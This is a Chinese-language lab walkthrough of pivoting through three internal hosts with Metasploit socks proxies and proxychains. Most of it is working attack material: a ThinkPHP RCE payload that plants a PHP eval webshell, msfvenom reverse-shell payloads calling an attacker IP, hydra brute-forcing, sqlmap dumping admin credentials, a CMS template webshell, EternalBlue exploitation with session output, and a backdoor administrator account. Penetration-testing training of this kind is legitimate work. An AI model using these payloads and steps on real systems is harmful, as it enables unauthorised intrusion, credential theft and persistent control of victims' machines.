Socks代理实战(MSF)

渗透场景

7d3fec2895a6ffa241bcbac1e7076e1f

测试Target1

Target1环境信息

1
2
3
4
5
6
7
8
操作系统:CentOS7_64
桥接网卡:VMnet0 10.63.165.242
仅主机:VMnet2 192.168.22.11
root密码: (一个空格)
宝塔后台登陆地址及密码:
地址:http://10.63.165.242:8888/
账号:eaj3yhsl
密码:41bb8fee

信息收集

  • 端口信息收集
1
2
3
4
nmap -A -T4 -p- --script vuln 10.63.165.242

开放端口:21/22/80/111/888/3306/8888
操作系统:Linux

分析利用

  • 21 / 22端口

弱口令爆破

1
2
3
hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 10.63.165.242 ftp

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 10.63.165.242 ssh
  • 3306端口

不允许远程IP连接

  • 80端口

Thinkphp v5.0 存在远程命令执行漏洞,通过命令执行写入一句话,可GetShell

1
2
3
4
5
6
7
8
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpin
fo&vars[1][]=1

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=syste
m&vars[1][]=whoami

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_
put_contents&vars[1][]=shell1.php&vars[1][]=<?php @eval($_POST[c]);?>

Webshell地址:http://10.63.165.242/shell.php

密码:c

image-20230911094644865

image-20230911094700435

主机信息收集

1
2
ifconfig
# 发现存在192.168.22.0/24的内网网段。

image-20230911094809677

探测此网段存活主机:发现存活主机 192.168.22.22

可用使用ping扫描脚本跑一下

  • ping.sh
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash
for num in {1..254};
do
ip=192.168.22.$num
ping -c1 $ip >/dev/null 2>&1
if [ $? = 0 ];
then
echo "$ip" ok
else
echo "$ip" fail
fi
done
1
2
chmod 777 ping.sh
./ping.sh > ping.txt

image-20230911103351537

  • Ladongo

https://github.com/k8gege/LadonGo

1
./Ladon64.lnx&nbsp;192.168.22.0/24&nbsp;OnlinePC&nbsp;>&nbsp;1
  • kscan

https://github.com/lcvvvv/kscan

  • fscan

https://github.com/shadow1ng/fscan

1
fscan_amd64 -h 192.168.22.0/24

反弹Shell

反弹Target1的Shell到MSF

  • msfvenom生成payload
1
2
3
4
5
6
7
# 生成php脚本payload

msfvenom -p php/meterpreter/reverse_tcp lhost=10.63.174.25 lport=6666 R -o kc1.php

# 生成Linux系统elf可执行文件

msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.0.132 lport=6667 -f elf -o kc1.elf
  • 上传到Target1的/tmp目录下执行
1
2
3
4
5
6
7
# 赋予执行权限

chmod 777 kc.elf

# 执行程序

./kc.elf

建立Socks代理

  • 获得Target1的meterpreter shell后,添加到192.168.22.0/24网段的路由
1
2
run autoroute -s 192.168.22.0/24
run autoroute -p

image-20230911155411082

  • 使用MSF的socks5模块启动socks代理服务
1
2
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run
  • 配置 proxychains 代理工具
1
2
3
vim /etc/proxychains.conf

socks5 127.0.0.1 1080

image-20230911163424013

测试Target2

Target2环境信息

1
2
3
4
5
6
7
8
操作系统:Ubunti16.04_64
仅主机:VMnet3 192.168.22.22
仅主机:VMnet4 192.168.33.22
root密码:root
宝塔后台登陆地址及密码:
地址:http://192.168.22.22:8888/2cc52ec0/
账号:xdynr37d
密码:123qwe..

信息收集

端口扫描

1
2
3
proxychains nmap -sT -Pn -p- -n -T4 192.168.22.22
开放端口:21/22/80/3306/8888
操作系统:linux

image-20230911165012716

image-20230911165449801

分析利用

  • 21 / 22 / 3306端口

弱口令爆破

1
2
3
4
5
proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ftp

proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ssh

proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 mysql
  • 8888端口

宝塔页面,无法利用

80端口

bagecms,SQL注入

1
proxychains3 sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword
1
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword --dbs

image-20230911170739869

1
2
3
[*] bagecms 
[*] information_schema
[*] test
1
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword -D bagecms --tables
1
proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword -D bagecms -T bage_admin --dump
1
2
3
得到后台登录账号密码为:admin/123qwe

后台登录地址:http://192.168.22.22/index.php?r=admini/public/login

后台任意文件修改Getshell

登录进后台 -> 模板 -> 在index.php文件后面添加一句话马 -> 用cknife配置socks代理连接

image-20230911171934807

Webshell地址:http://192.168.22.22/index.php

Socks代理配置

  • 蚁剑配置socks代理连接webshell

caae2c952bd854cace596f948d4dd2ac

773c7bdd0014b3061324b3f501a7e3f4

  • Cknife设置Socks代理

主机信息收集

1
2
ifconfig
# 发现存在192.168.33.0/24的内网网段。

image-20230911172157168

1
探测此网段存活主机:发现存活主机192.168.33.33

image-20230911203154090

反弹Shell

反弹Target2的shell到MSF

  • msfvenom生成linux木马payload
1
msfvenom -p linux/x64/meterpreter/bind_tcp lport=5555 -f elf > kc23.elf
  • 上传到Target2的/tmp目录并执行
1
2
chmod 777 kc23.elf
./kc23.elf
  • 创建正向监听器,建立正向连接
1
2
3
4
5
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.22
set lport 5555
run

添加路由

  • 反弹回Target2的meterpreter shell之后,添加到33网段的路由:
1
2
run autoroute -s 192.168.33.0/24
run autoroute -p

测试Target3

Target3环境信息

1
2
3
操作系统:Windows7_64
仅主机:VMnet4 192.168.33.33
Administrator密码:root

信息收集

1
2
3
proxychains3 nmap -sT -Pn -p- -n -T4 192.168.33.33
开放端口:135/139/445/3389
操作系统:Windows

分析利用

  • 445端口

检测ms17-010漏洞

1
2
3
4
5
6
7
use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.33.33:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate
7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.33:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

利用ms17-010漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bin
d_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LPORT 4445
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] 192.168.33.33:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[*] 192.168.33.33:445 - Built a write-what-where primitive...
[+] 192.168.33.33:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.33.33:445 - Selecting PowerShell target
[*] 192.168.33.33:445 - Executing the payload...
[+] 192.168.33.33:445 - Service start timed out, OK if running a command or non-service
executable...
[*] Started bind TCP handler against 192.168.33.33:4445
[*] Sending stage (201283 bytes) to 192.168.33.33
[*] Meterpreter session 3 opened (192.168.33.22:54748 -> 192.168.33.33:4445) at 2020-06-
29 03:53:34 -0400
meterpreter > shell
Process 944 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
C:\Windows\system32>
  • 3389端口

远程桌面连接

1
2
3
4
5
6
# 添加管理员用户
net user test test123 /add
net localgroup administrators test /add

# 查看管理员用户
net localgroup administrators

Windows系统使用proxifier,代理RDP远程桌面连接

Linux系统使用proxychains代理 rdesktop 远程连接Windows桌面

1
proxychains rdesktop -u test -p test123 192.168.33.33

image-20230914132031339